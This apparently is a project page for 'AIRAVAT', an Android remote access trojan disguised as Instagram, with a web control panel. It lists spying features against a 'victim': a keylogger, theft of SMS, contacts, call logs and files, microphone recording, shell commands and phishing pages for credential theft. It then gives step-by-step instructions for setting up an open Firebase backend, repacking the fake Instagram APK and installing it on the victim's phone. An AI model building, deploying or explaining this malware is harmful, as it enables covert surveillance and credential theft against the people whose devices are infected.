AIRAVAT
A multifunctional Android RAT with GUI based Web Panel without port forwarding.
Features:
- Read all the files of Internal Storage
- Download Any Media to your Device from Victim's Device
- Get all the system information of Victim's Device
- Retrieve the List of Installed Applications
- Retrieve SMS
- Retrieve Call Logs
- Retrieve Contacts
- Send SMS
- Gets all the Notifications
- Keylogger
- Admin Permission
- Show Phishing Pages to steal credentials through notification.
- Steal credentials through pre-built phishing pages
- Open any suspicious website through notification to steal credentials.
- Record Audio through Mic
- Play music in Victim's device
- Vibrate Device
- Text To Speech
- Turn On/Off Torch Light
- Change Wallpaper
- Run shell Commands
- Get Clipboard text (Only When app's Activity is visible)
- Launch Any URL (Only When app's Activity is visible)
- Pre-Binded with Instagram WebView Phishing
- Runs In Background
- Auto Starts on restarting the device
- Auto Starts when any notification arrives
- No port forwarding needed
Note: Please use this software responsibly and in compliance with applicable laws and regulations.
For more information, please visit the project's GitHub repository:
Requirements
Before building the project, make sure you have the following:
- Firebase Account
- ApkEasy Tool (For PC) or ApkTool M (for Android)
How to Build
Follow these steps to build the project:
- Create a Firebase Account.
- Create a new project with any name.
- Enable Firebase Database and Firebase Storage in your project settings.
- In Firebase Database, click on the rules and set:
/* Allow read/write access to all users */
{
"rules": {
".read": true,
".write": true
}
}
Now you are ready to build your project using Firebase!
Firebase Setup
Here is how you can set up Firebase:
- Login to your Firebase Account.
- Create a new project with any name.
- Enable Firebase Database and Firebase Storage in your project settings.
That's it! You have successfully set up Firebase for your project.
```Panel Setup
You can use Github Pages, Firebase Hosting, or any Hosting Website (except 000webhost) for hosting the panel.
Open index.html File and from line number 16, replace the config with your web app config which you have created on Step 6.
Save the file, Your Panel Setup is completed.
Android RAT
Download Instagram.apk
```Decompile it using any Decompiler recommend above.
Now open res/values/strings.xml file.
Replace values of firebase_database_url,
firebase_database_url,
google_api_key,
google_app_id, google_storage_bucket,
project_id
with your Firebase Account using google-services.json file which you have downloaded on step 5.
if you want to copy one by one use this table
Firebase Configuration
Name | Value | Action |
---|---|---|
firebase_database_url | https://your_database_url.firebase.com | |
google_api_key | your_api_key | |
google_app_id | your_app_id | |
google_storage_bucket | your_storage_bucket_url | |
project_id | project_id |
if you want to copy all at once then this code section
<string name="firebase_database_url">https://your_database_url.firebase.com</string>
<string name="google_api_key">your_api_key</string>
<string name="google_app_id">your_app_id</string>
<string name="google_storage_bucket">your_storage_bucket_url</string>
<string name="project_id">project_id</string>
App Installation and Connection Tutorial
Follow the steps below to install the app on the victim's device and establish a connection:
- Compile the code with Appt2.
- Install the app on the victim's device.
- Grant all the necessary permissions for the app.
- The connection will be displayed in the web panel.
0 Comments